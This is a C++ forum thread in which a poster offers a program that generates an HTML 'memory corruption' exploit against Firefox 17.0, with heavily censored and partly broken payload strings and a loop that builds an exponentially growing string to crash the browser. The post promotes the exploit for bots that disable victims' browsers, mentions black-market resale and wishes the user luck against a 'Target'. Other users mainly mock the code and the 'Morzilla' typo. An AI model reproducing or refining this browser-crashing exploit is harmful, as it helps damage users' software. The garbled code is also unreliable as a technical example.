C++

Forum

 
[0day] Browser Exploit [CODE] Using C++ for this

closed account (ozUkoG1T)
Hi,

I have translated a HTML script into a C++ code which allows the attacker to simple create a Memory Corruption on Morzilla Firefox Version 17.0. These type of attacks are not very effective but interesting when these exploits are triggered these create local issues. Such as the Morzilla Firefox behaving in a different way or loss of saved password to even becoming useless for any purpose. This Exploit is not discovered by me but I have translated this exploit in C++. This is a direct snippet out of my project , a Pentesting Toolkit. This has been tested in Linux SUSE - Enterprice v.11. Such Exploits can again be sold on Black Market for aroung $40,000 but since it is reported by the original creator[s] to Morzilla it is not worth anymore considering Morzilla probably try patch it up.

These Scripts can be used in Bots to make a crash of a Browsers look legitimate and some Browsers has protections , suppose on Windows most of the Top level Browsers such as Google Chrome may have a layer of protection but to make sure those level protections are avoided yet the browser is successfully killed they use these scripts. This will allow these Bots to make sure the Malware is damaging the Interior of the Program rather than the outer so that the Browser will be rendered useless.

CODE: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
 
#include<iostream>
#include<fstream>
using namespace std;
int main()
{
	ofstream ExploitFile; 
	ExploitFile.open("Crash.html");
	ExploitFile<<"<html>"<<endl;
	ExploitFile<<"<head>"<<endl;
	ExploitFile<<"<title>Memory Corruption -Proof-Of-Conecpt</title>"<<endl;
	ExploitFile<<"<**** onload=\"""**********:KedAns();""\">"<<endl;
	ExploitFile<<"<script ********=\"""**********""\""<<">"<<endl;
	ExploitFile<<"function KedAns()"<<endl;
	ExploitFile<<"{"<<endl;
	ExploitFile<<"var puf =unescape(\"""??""\");"<<endl; // This is the payload for our Memory Corruption.
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
    ExploitFile<<"********.write(puf);"<<endl;
	ExploitFile<<"var buffer = '\x41\x42\x43'"<<endl;
	ExploitFile<<"for(i=0; i <= 999 ; ++i)"<<endl;
	ExploitFile<<"{"<<endl;
	ExploitFile<<"buffer+=buffer+buffer"<<endl;
	ExploitFile<<"********.write(buffer);"<<endl;
	ExploitFile<<"}"<<endl;
	ExploitFile<<"}"<<endl;
	ExploitFile<<"</script>"<<endl;
    ExploitFile<<"</head>"<<endl;
	ExploitFile<<"</****>"<<endl;
	ExploitFile<<"</html>"<<endl;  //The Exploited File is ready for duty. Let me just close this File

	ExploitFile.close(); // File is successfully closes and ready for action.

	cout<<"Exploited File is ready to be executed by Target! Good Luck\n";
	cin.get();
	return 0;
}


Please use it responsibly I am not responsible for any Damage you made. This shows Internet Browsers are prone to destruction as well not just AV. Some Bots do this so that the User cannot use that browser due to reasons such as Plugins and such.

Learn From this!
S G H (2638)
Uhm... Besides being malicious HTML... Nothing says a browser cannot keep track of every allocation and make sure on page unload all that memory gets released...
Also this is a plain write-to-file code, it has very few to do with:
1. The section (Unix? What?)
2. C++ (C++? Seriously? This is like copy-pasting some lines of text, why such a waste of memory, ideas and everything?)

Also: unescape(\"""??""\")
I hope you realize this code won't even compile.

Also making sure you know it wasn't me who reported.
closed account (ozUkoG1T)
No , the reason this is in Unix\Linux platform is since this code has been tested on Linux.

Also the code does compile on Visual C++ I actually did it. I promise ,

Also I belive you bro. I know you did not report it.
S G H (2638)
What I mean is, this should be a plain HTML source file and should be put under Lounge...

This isn't directly related to C++.
modoran (2077)
EssGeEich wrote:
Also: unescape(\"""??""\")
I hope you realize this code won't even compile.


It does compile, but a 2 double quotes inside a literal string expands to nothing. For example:
char test[] = "123""456""";
is the same as:
char test[] = "123456";
S G H (2638)
Never seen code like that being used anywhere. Anyways probably what he wrote isn't what he meant. Or maybe it is.
Disch (13742)
Why is he calling it Morzilla?
S G H (2638)
Last edited on
Disch (13742)
That's even more confusing.

Is that like a fork or something? Is Morzilla different from Mozilla?
S G H (2638)
Last edited on
Disch (13742)
That doesn't help.
LB (13399)
@mordoran That's because the quotes aren't inside the string literal, they're actually separating different string literals. However, in C/C++, consecutive string literals like that are concatenated.
@EssGeEich It's not C++, it's inside a C++ string literal...
closed account (ozUkoG1T)
I meant Mozilla and NOT MORZILLA SORRY , guys
S G H (2638)
:'D
Catfish3 (666)
Also I belive you bro. I know you did not report it.

Hmm... so does that mean you know who did, bro?
Topic archived. No new replies allowed.